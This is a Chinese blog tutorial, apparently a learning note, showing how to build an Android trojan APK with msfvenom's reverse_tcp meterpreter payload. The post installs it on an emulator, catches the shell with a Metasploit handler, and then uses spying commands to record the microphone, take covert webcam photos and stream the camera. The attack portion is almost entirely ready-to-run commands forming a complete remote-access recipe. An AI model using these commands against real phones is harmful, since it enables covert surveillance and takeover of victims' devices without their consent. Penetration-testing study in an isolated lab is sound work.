目录

目录

前言

系列文章列表

渗透测试基础之永恒之蓝漏洞复现http://t.csdn.cn/EsMu2

思维导图

1，实验涉及复现环境   

2,Android模拟器环境配置

2.1,首先从官网上下载雷电模拟器

2.2,安装雷电模拟器 

2.3, 对模拟器网络进行配置

2.3.1,为什么要进行配置

2.3.2,进行配置 

2.3.3,安装成功后显示安装成功

3，生成后门

3.1,生成木马apk文件

3.2,将文件复制到windows系统上

3.3,将apk文件安装到模拟器中

3.4,木马文件安装成功

4,使用metasploit控制台对模拟器进行攻击

4.1 启动metasploit

4.2,使用攻击模块

4.3,设置攻击载荷

4.4,设置攻击机和端口号和攻击：

4.5,回到我们的模拟器靶机，我们点击运行我们安装的文件

 4.6 看到成功返回shell

5, 成功后我们能做什么?

5.1,查看模拟手机的版本信息

5.2,查看手机的网络信息

5.3,查看root状态

5.4,启用网页视屏聊天

5.5,查看手机有几个摄像头

5.6,进行录音操作

5.7,一些其他操作

5.7.1.网络和系统信息获取

5.7.2,系统命令执行和摄像头操作

6，总结

---

前言

本文章主要是进行一次测试吧,自己之前也没有进行过测试关于apk木马远控,最近事情也比较多,自己也就做一个简单的测试吧,后期会尝试使用自己的手机做一个真机测试.

系列文章列表

渗透测试基础之永恒之蓝漏洞复现http://t.csdn.cn/EsMu2

思维导图

1，实验涉及复现环境   

• Kali平台（Hack）：192.168.10.xxx
• Android模拟器（靶机1）
• kali需要使用桥接模式,不然无法使用

                         如果出现桥接无法使用可以看这位大佬的配置教程 

                                kali无法连接网络（桥接、NAT无效）http://t.csdn.cn/r9cug

2,Android模拟器环境配置

2.1,首先从官网上下载雷电模拟器

                                                   打开官网进行下载

雷电安卓模拟器-手游模拟器安卓版_android手机模拟器电脑版_雷电模拟器官网 (ldmnq.com)https://www.ldmnq.com/

2.2,安装雷电模拟器 

                   下载完后。点击.exe文件直接运行安装，运行，下一步，直接完成安装。

                         安装后我们会在桌面看到这两个图标,然后我们点击雷神多开器

2.3, 对模拟器网络进行配置

2.3.1,为什么要进行配置

   安照我自己的理解就是,我们是在模拟器中模拟手机,所以就类似于我们使用虚拟机一样,所以我们需要将其与主机在同一网段下,这样我们才能对其进行攻击与控制.

2.3.2,进行配置 

对模拟器网络进行配置在右边的设置里面选择设置>网络设置>网络桥接模式开启，ip设置dhcp，最下面点击安装：

2.3.3,安装成功后显示安装成功

3，生成后门

3.1,生成木马apk文件

打开虚拟机，启动kali,打开终端，生成apk后门。lhost为kali的ip（可以根据自己的IP设定），lport指定一个端口5001(这里生成时指定的端口要与后续使用攻击端口一致,当然也不能使用特殊端口)。打开终端输入命令：

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.223.138 lport=5001 >内心如初.apk

3.2,将文件复制到windows系统上

生成文件后,因为我是在桌面打开的终端文件会自动生成到桌面,然后将apk文件粘贴到我们的windows平台下,然后启动我们的雷电模拟器，点击启动：

3.3,将apk文件安装到模拟器中

                           这里我们可以将文件拖入或是选择文件放入也行

                                     在右下角有个apk,点击选择文件安装。

3.4,木马文件安装成功

                                出现下面的图标代表安装木马文件成功

4,使用metasploit控制台对模拟器进行攻击

这里关于前面的内容我就快速过来了,如果感兴趣的可以去看系列文章,有前面操作的详细介绍

4.1 启动metasploit

msfconsole 

4.2,使用攻击模块

use exploit/multi/handler

4.3,设置攻击载荷

                                           攻击载荷也就是攻击的脚本

set payload android/meterpreter/reverse_tcp

4.4,设置攻击机和端口号和攻击：

                 这里设置的ip地址是kali的,设置的端口要与制作木马时设置的一致

set lhost 192.168.xxx.xxx

set lport 5001

run

 

4.5,回到我们的模拟器靶机，我们点击运行我们安装的文件

 4.6 看到成功返回shell

                                     只要双击一次即可,这里是我多点了

5, 攻击成功后我们能做什么?

                                    这里在进行其他操作前需要先加载stdapi扩展

load stdapi

5.1,查看模拟手机的版本信息

sysinfo

5.2,查看手机的网络信息

ifconfig

5.3,查看root状态

check_root

                                                         手机无root权限

5.4,启用网页视屏聊天

webcam_chat

5.5,查看手机有几个摄像头

webcam_list

                                                        显示有两个摄像头 

5.6,进行录音操作

record_mic

5.7,一些其他操作

                                    进行调用摄像头偷拍,默认为前置摄像头

webcam_snap

网页摄像机视屏流，显示实时画面能够调用摄像头，实时观看被攻击者的像机对着的物体，以下为通过此办法可以获取到一段图片资料 

webcam_stream

                              获得shell后有很多的攻击方法,将其汇总如下：

5.7.1.网络和系统信息获取

5.7.2,系统命令执行和摄像头操作

6，总结

本章是对使用木马对手机渗透远控的一次测试,在测试过程中我遇到了,在连接时IP无法使用,在我的思考下,我发现可能是主机的链接方式需要以桥接模式,这样才能保证,主机与和攻击目在同一网段下,但我链接后,发现无论如何也没发连上桥接网络的网络,并且是用ifconfig,并没有显示kali的主机ipv4地址,在我的不断搜索和尝试下,最终连上了网路获取到了新的IP地址,然后重新制作木马apk文件,再进行一次刚刚的流程,虽然解决问题的过程很累,但解决的那一刻,我是很欣喜的,快乐也就如此了吧,再学习自己喜欢的事情上,总是很有动力.

每日一言

如果可以的话，我也想成为这个世界中特殊的存在。

  如果我的学习笔记对你有用，不妨点赞收藏一下，感谢你的支持，当然也欢迎大佬给我一下建议或是对笔记中的不足进行补充，对我学习大有帮助，谢谢。